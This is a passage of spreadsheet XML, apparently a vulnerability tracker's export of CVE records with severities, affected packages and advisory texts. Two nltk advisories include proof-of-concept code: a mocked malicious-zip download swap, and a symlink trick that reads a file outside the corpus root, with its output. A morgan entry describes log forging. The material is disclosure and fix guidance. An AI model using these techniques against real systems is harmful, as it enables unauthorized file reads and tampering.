r="E1562" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1562" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1562" s="5" t="inlineStr" /><c r="H1562" s="5" t="n"><v>0.002</v></c><c r="I1562" s="5" t="inlineStr" /><c r="J1562" s="5" t="inlineStr" /><c r="K1562" s="5" t="inlineStr"><is><t>netgear:rax30, netgear:rax30_firmware, netgear:rax35, netgear:rax35_firmware, netgear:rax38, netgear:rax38_firmware, netgear:rax40, netgear:rax40_firmware, netgear:raxe300, netgear:raxe300_firmware</t></is></c><c r="L1562" s="5" t="inlineStr" /><c r="M1562" s="5" t="inlineStr" /><c r="N1562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1562" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1562" s="5" t="inlineStr" /><c r="R1562" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S1562" s="5" t="inlineStr"><is><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is></c><c r="T1562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t></is></c></row><row r="1563"><c r="A1563" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1563" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D1563" s="5" t="inlineStr" /><c r="E1563" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1563" s="5" t="inlineStr" /><c r="H1563" s="5" t="n"><v>0.001</v></c><c r="I1563" s="5" t="inlineStr" /><c r="J1563" s="5" t="inlineStr" /><c r="K1563" s="5" t="inlineStr" /><c r="L1563" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1563" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1563" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1563" s="5" t="inlineStr" /><c r="R1563" s="5" t="inlineStr" /><c r="S1563" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="T1563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="1564"><c r="A1564" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1564" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D1564" s="5" t="inlineStr" /><c r="E1564" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1564" s="5" t="inlineStr" /><c r="H1564" s="5" t="n"><v>0.002</v></c><c r="I1564" s="5" t="inlineStr" /><c r="J1564" s="5" t="inlineStr" /><c r="K1564" s="5" t="inlineStr" /><c r="L1564" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M1564" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1564" s="5" t="inlineStr" /><c r="R1564" s="5" t="inlineStr" /><c r="S1564" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="T1564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="1565"><c r="A1565" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1565" s="5" t="inlineStr"><is><t>CVE-2026-45219</t></is></c><c r="D1565" s="5" t="inlineStr" /><c r="E1565" s="5" t="inlineStr" /><c r="F1565" s="5" t="inlineStr" /><c r="G1565" s="5" t="inlineStr" /><c r="H1565" s="5" t="inlineStr" /><c r="I1565" s="5" t="inlineStr" /><c r="J1565" s="5" t="inlineStr" /><c r="K1565" s="5" t="inlineStr" /><c r="L1565" s="5" t="inlineStr" /><c r="M1565" s="5" t="inlineStr" /><c r="N1565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1565" s="5" t="inlineStr" /><c r="R1565" s="5" t="inlineStr" /><c r="S1565" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45219</t></is></c></row><row r="1566"><c r="A1566" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1566" s="5" t="inlineStr"><is><t>CVE-2026-45220</t></is></c><c r="D1566" s="5" t="inlineStr" /><c r="E1566" s="5" t="inlineStr" /><c r="F1566" s="5" t="inlineStr" /><c r="G1566" s="5" t="inlineStr" /><c r="H1566" s="5" t="inlineStr" /><c r="I1566" s="5" t="inlineStr" /><c r="J1566" s="5" t="inlineStr" /><c r="K1566" s="5" t="inlineStr" /><c r="L1566" s="5" t="inlineStr" /><c r="M1566" s="5" t="inlineStr" /><c r="N1566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1566" s="5" t="inlineStr" /><c r="R1566" s="5" t="inlineStr" /><c r="S1566" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45220</t></is></c></row><row r="1567"><c r="A1567" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1567" s="5" t="inlineStr"><is><t>CVE-2026-49153</t></is></c><c r="D1567" s="5" t="inlineStr" /><c r="E1567" s="5" t="inlineStr" /><c r="F1567" s="5" t="inlineStr" /><c r="G1567" s="5" t="inlineStr" /><c r="H1567" s="5" t="inlineStr" /><c r="I1567" s="5" t="inlineStr" /><c r="J1567" s="5" t="inlineStr" /><c r="K1567" s="5" t="inlineStr" /><c r="L1567" s="5" t="inlineStr" /><c r="M1567" s="5" t="inlineStr" /><c r="N1567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1567" s="5" t="inlineStr" /><c r="R1567" s="5" t="inlineStr" /><c r="S1567" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49153</t></is></c></row><row r="1568"><c r="A1568" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1568" s="5" t="inlineStr"><is><t>CVE-2026-49154</t></is></c><c r="D1568" s="5" t="inlineStr" /><c r="E1568" s="5" t="inlineStr" /><c r="F1568" s="5" t="inlineStr" /><c r="G1568" s="5" t="inlineStr" /><c r="H1568" s="5" t="inlineStr" /><c r="I1568" s="5" t="inlineStr" /><c r="J1568" s="5" t="inlineStr" /><c r="K1568" s="5" t="inlineStr" /><c r="L1568" s="5" t="inlineStr" /><c r="M1568" s="5" t="inlineStr" /><c r="N1568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1568" s="5" t="inlineStr" /><c r="R1568" s="5" t="inlineStr" /><c r="S1568" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49154</t></is></c></row><row r="1569"><c r="A1569" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1569" s="5" t="inlineStr"><is><t>CVE-2026-49155</t></is></c><c r="D1569" s="5" t="inlineStr" /><c r="E1569" s="5" t="inlineStr" /><c r="F1569" s="5" t="inlineStr" /><c r="G1569" s="5" t="inlineStr" /><c r="H1569" s="5" t="inlineStr" /><c r="I1569" s="5" t="inlineStr" /><c r="J1569" s="5" t="inlineStr" /><c r="K1569" s="5" t="inlineStr" /><c r="L1569" s="5" t="inlineStr" /><c r="M1569" s="5" t="inlineStr" /><c r="N1569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1569" s="5" t="inlineStr" /><c r="R1569" s="5" t="inlineStr" /><c r="S1569" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49155</t></is></c></row><row r="1570"><c r="A1570" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1570" s="5" t="inlineStr"><is><t>CVE-2026-49156</t></is></c><c r="D1570" s="5" t="inlineStr" /><c r="E1570" s="5" t="inlineStr" /><c r="F1570" s="5" t="inlineStr" /><c r="G1570" s="5" t="inlineStr" /><c r="H1570" s="5" t="inlineStr" /><c r="I1570" s="5" t="inlineStr" /><c r="J1570" s="5" t="inlineStr" /><c r="K1570" s="5" t="inlineStr" /><c r="L1570" s="5" t="inlineStr" /><c r="M1570" s="5" t="inlineStr" /><c r="N1570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1570" s="5" t="inlineStr" /><c r="R1570" s="5" t="inlineStr" /><c r="S1570" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49156</t></is></c></row><row r="1571"><c r="A1571" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1571" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D1571" s="5" t="inlineStr" /><c r="E1571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1571" s="5" t="inlineStr" /><c r="H1571" s="5" t="n"><v>0.01</v></c><c r="I1571" s="5" t="inlineStr" /><c r="J1571" s="5" t="inlineStr" /><c r="K1571" s="5" t="inlineStr" /><c r="L1571" s="5" t="inlineStr"><is><t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M1571" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1571" s="5" t="inlineStr" /><c r="R1571" s="5" t="inlineStr" /><c r="S1571" s="5" t="inlineStr"><is><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is></c><c r="T1571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="1572"><c r="A1572" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1572" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D1572" s="5" t="inlineStr" /><c r="E1572" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1572" s="5" t="inlineStr" /><c r="H1572" s="5" t="n"><v>0.002</v></c><c r="I1572" s="5" t="inlineStr" /><c r="J1572" s="5" t="inlineStr" /><c r="K1572" s="5" t="inlineStr" /><c r="L1572" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1572" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1572" s="5" t="inlineStr" /><c r="R1572" s="5" t="inlineStr" /><c r="S1572" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="T1572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="1573"><c r="A1573" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1573" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D1573" s="5" t="inlineStr" /><c r="E1573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1573" s="5" t="inlineStr" /><c r="H1573" s="5" t="n"><v>0.006</v></c><c r="I1573" s="5" t="inlineStr" /><c r="J1573" s="5" t="inlineStr" /><c r="K1573" s="5" t="inlineStr" /><c r="L1573" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1573" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1573" s="5" t="inlineStr" /><c r="R1573" s="5" t="inlineStr" /><c r="S1573" s="5" t="inlineStr"><is><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is></c><c r="T1573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="1574"><c r="A1574" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1574" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D1574" s="5" t="inlineStr" /><c r="E1574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1574" s="5" t="inlineStr" /><c r="H1574" s="5" t="n"><v>0.004</v></c><c r="I1574" s="5" t="inlineStr" /><c r="J1574" s="5" t="inlineStr" /><c r="K1574" s="5" t="inlineStr" /><c r="L1574" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1574" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1574" s="5" t="inlineStr" /><c r="R1574" s="5" t="inlineStr" /><c r="S1574" s="5" t="inlineStr"><is><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is></c><c r="T1574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="1575"><c r="A1575" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1575" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D1575" s="5" t="inlineStr" /><c r="E1575" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1575" s="5" t="inlineStr" /><c r="H1575" s="5" t="n"><v>0.012</v></c><c r="I1575" s="5" t="inlineStr" /><c r="J1575" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K1575" s="5" t="inlineStr" /><c r="L1575" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M1575" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1575" s="5" t="inlineStr" /><c r="R1575" s="5" t="inlineStr" /><c r="S1575" s="5" t="inlineStr"><is><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is></c><c r="T1575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="1576"><c r="A1576" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1576" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D1576" s="5" t="inlineStr" /><c r="E1576" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1576" s="5" t="inlineStr" /><c r="H1576" s="5" t="n"><v>0.005</v></c><c r="I1576" s="5" t="inlineStr" /><c r="J1576" s="5" t="inlineStr" /><c r="K1576" s="5" t="inlineStr" /><c r="L1576" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Build.Tasks.Git, NuGet:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M1576" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1576" s="5" t="inlineStr" /><c r="R1576" s="5" t="inlineStr" /><c r="S1576" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.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[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="T1576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="1577"><c r="A1577" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1577" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D1577" s="5" t="inlineStr" /><c r="E1577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1577" s="5" t="inlineStr" /><c r="H1577" s="5" t="n"><v>0.006</v></c><c r="I1577" s="5" t="inlineStr" /><c r="J1577" s="5" t="inlineStr" /><c r="K1577" s="5" t="inlineStr" /><c r="L1577" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1577" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1577" s="5" t="inlineStr" /><c r="R1577" s="5" t="inlineStr" /><c r="S1577" s="5" t="inlineStr"><is><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is></c><c r="T1577" s="6" 